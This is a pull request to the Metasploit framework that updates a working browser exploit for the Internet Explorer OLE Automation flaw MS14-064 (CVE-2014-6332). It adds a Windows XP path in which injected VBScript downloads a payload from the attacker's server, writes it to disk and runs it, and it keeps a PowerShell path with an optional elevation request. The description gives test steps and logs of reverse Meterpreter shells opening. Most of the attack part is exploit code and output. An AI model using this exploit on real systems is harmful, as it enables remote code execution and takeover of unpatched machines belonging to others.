### PR TITLE
Update MS14-064 for Windows XP

### DIFF
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -1,4 +1,4 @@
-##
+/ms14_064_ole_code_execution.rb##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
@@ -23,9 +23,7 @@ class Metasploit4 < Msf::Exploit::Remote
         Windows 10, and there is no patch for Windows XP or older.
 
         Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
-        Windows systems, the exploit will try using Powershell instead. If Protected Mode is
-        enabled, the user has to manually allow powershell.exe to execute in order to be
-        compromised.
+        newer Windows systems, the exploit will try using Powershell instead.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -327,8 +325,8 @@ end function
     end
 
     # Powershell was the first technique demonstrated publicly.
-    # On some Windows setups such as Windows 7 + IE 8, this works quite well.
-    # But you will get a prompt for IE9 or newer.
+    # On some Windows setups such as Windows 7 without a service pack, this works quite well.
+    # But other Windows setups you will get a prompt.
     payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
     payl.slice! "powershell.exe "
 

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -1,4 +1,4 @@
-/ms14_064_ole_code_execution.rb##
+##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
   include Msf::Exploit::Powershell
 
   def initialize(info={})
@@ -18,10 +19,13 @@ class Metasploit4 < Msf::Exploit::Remote
       'Name'           => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
       'Description'    => %q{
         This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
-        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
-        For this module to be successful, powershell is required on the target machine. On
-        Internet Explorer versions using Protected Mode, the user has to manually allow
-        powershell.exe to execute in order to be compromised.
+        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
+        Windows 10, and there is no patch for Windows XP or older.
+
+        Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
+        Windows systems, the exploit will try using Powershell instead. If Protected Mode is
+        enabled, the user has to manually allow powershell.exe to execute in order to be
+        compromised.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -32,6 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
           'Wesley Neelen', # security[at]forsec.nl
           'GradiusX <francescomifsud[at]gmail.com>',
           'b33f', # @FuzzySec
+          'sinn3r'
         ],
       'References'     =>
         [
@@ -46,14 +51,24 @@ class Metasploit4 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [
+            'Windows XP',
+            {
+              'os_name' => OperatingSystems::Match::WINDOWS_XP
+            }
+          ],
+          [
+            'Other Windows x86',
+              {
+                'os_name' => OperatingSystems::Match::WINDOWS,
+              }
+          ]
         ],
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
           :ua_name => HttpClients::IE,
-          :os_name => /win/i,
-          :arch    => 'x86',
+          :arch    => ARCH_X86,
           :ua_ver  => lambda { |ver| ver.to_i.between?(4, 10) }
         },
       'DefaultOptions' =>
@@ -260,20 +275,18 @@ end function
 
   end
 
-  def get_html()
+  def vbs_vector(prep)
+    vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
+    gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
 
-    if datastore['TRYUAC']
-      tryuac = 'runas'
-    else
-      tryuac = 'open'
-    end
+    payload_src  = (datastore['SSL'] ? 'https' : 'http')
+    payload_src << '://'
+    payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
+    payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
 
-    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
-    payl.slice! "powershell.exe "
-    prep = vbs_prepare()
-
-    html = %Q|
-<!doctype html>
+    # I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
+    # with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.
+    %Q|<!doctype html>
 <html>
 <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@@ -282,8 +295,19 @@ end function
 function runaaaa()
 On Error Resume Next
 
+set xmlhttp = CreateObject("Microsoft.XMLHTTP")
+xmlhttp.open "GET", "#{payload_src}", False
+xmlhttp.send
+
+Set objFSO=CreateObject("Scripting.FileSystemObject")
+folder = objFSO.GetSpecialFolder(2)
+scriptName = folder + "\\#{vbs_name}"
+Set objFile = objFSO.CreateTextFile(scriptName,True)
+objFile.Write xmlhttp.responseText
+objFile.Close
+
 set shell=createobject("Shell.Application")
-shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
+shell.ShellExecute "wscript.exe", scriptName, "", "open", 0
 
 end function
 </script>
@@ -293,12 +317,71 @@ end function
 </body>
 </html>
     |
+  end
 
+  def powershell_vector(prep)
+    if datastore['TRYUAC']
+      tryuac = 'runas'
+    else
+      tryuac = 'open'
+    end
+
+    # Powershell was the first technique demonstrated publicly.
+    # On some Windows setups such as Windows 7 + IE 8, this works quite well.
+    # But you will get a prompt for IE9 or newer.
+    payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
+    payl.slice! "powershell.exe "
+
+    %Q|<!doctype html>
+<html>
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+<body>
+<script language="VBScript">
+function runaaaa()
+On Error Resume Next
+set shell=createobject("Shell.Application")
+shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
+end function
+</script>
+<script language="VBScript">
+#{prep}
+</script>
+</body>
+</html>
+    |
+  end
+
+  def get_html
+    prep = vbs_prepare()
+    case get_target.name
+    when OperatingSystems::Match::WINDOWS_XP
+      return vbs_vector(prep)
+    else
+      return powershell_vector(prep)
+    end
   end
 
   def on_request_exploit(cli, request, target_info)
-    print_status("Requesting: #{request.uri}")
-    send_exploit_html(cli, get_html())
+    case request.uri
+    when /\.gif/
+      if get_target.name =~ OperatingSystems::Match::WINDOWS_XP
+        p = regenerate_payload(cli)
+        data = generate_payload_exe({:code => p.encoded})
+
+        # The default template uses \n, and wscript.exe isn't very happy about that.
+        # It should be \r\n .
+        vbs = Msf::Util::EXE.to_exe_vbs(data).gsub(/\x0a/, "\r\n")
+
+        send_response(cli, vbs)
+      else
+        # The VBS technique is only for Windows XP. So if a non-XP system is requesting it,
+        # something is not right.
+        send_not_found(cli)
+      end
+    else
+      send_exploit_html(cli, get_html)
+    end
   end
 
 end

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -16,7 +16,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
+      'Name'           => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
       'Description'    => %q{
         This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
         The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to


### PR DESCRIPTION
This updates the MS14-064 module to use VBScript to get a shell instead of Powershell. The reason for this is because Windows XP by default does not support Powershell.
## XP Test
- [x] Get a Windows XP box
- [x] Make sure you're running IE8 (IE8 is the latest IE you can get for XP)
- [x] Run the module: `./msfconsole -q -x "use exploit/windows/browser/ms14_064_ole_code_execution; run"`
- [x] The exploit should give you an URL. Open IE8, and go to it.
- [x] You should get a shell like the following

```
$ ./msfconsole -q -x "use exploit/windows/browser/ms14_064_ole_code_execution; run"
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/XpFK5n2wCF7FP2k
[*]  Local IP: http://192.168.1.64:8080/XpFK5n2wCF7FP2k
[*] Server started.
[*] 192.168.1.64     ms14_064_ole_code_execution - Gathering target information.
[*] 192.168.1.64     ms14_064_ole_code_execution - Sending response HTML.
[*] Sending stage (770048 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.64:53213) at 2015-02-23 23:13:19 -0600
```
## Win 7 Test:
- [x] Get a Windows 7 box (no service pack)
- [x] You can get either IE8 or IE9 on that box (A newly installed Win 7 comes with IE8)
- [x] `./msfconsole -q -x "use exploit/windows/browser/ms14_064_ole_code_execution; run"`
- [x] If you're on IE8, you should just get a shell without a prompt. If you have a service pack, you will get a prompt. And you will have to click on Allow to get a shell. At the end, you should get something like this:

```
msf exploit(ms14_064_ole_code_execution) > [*] 192.168.1.65     ms14_064_ole_code_execution - Gathering target information.
[*] 192.168.1.65     ms14_064_ole_code_execution - Sending response HTML.
[*] Sending stage (770048 bytes) to 192.168.1.65
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.65:49345) at 2015-02-23 23:18:25 -0600
```

Note: The powershell attack vector may take several more seconds to get you a shell compare to the VBS attack vector. So when all you see is "Sending response HTML", try to wait a little longer. Or maybe you will not experience this at all.
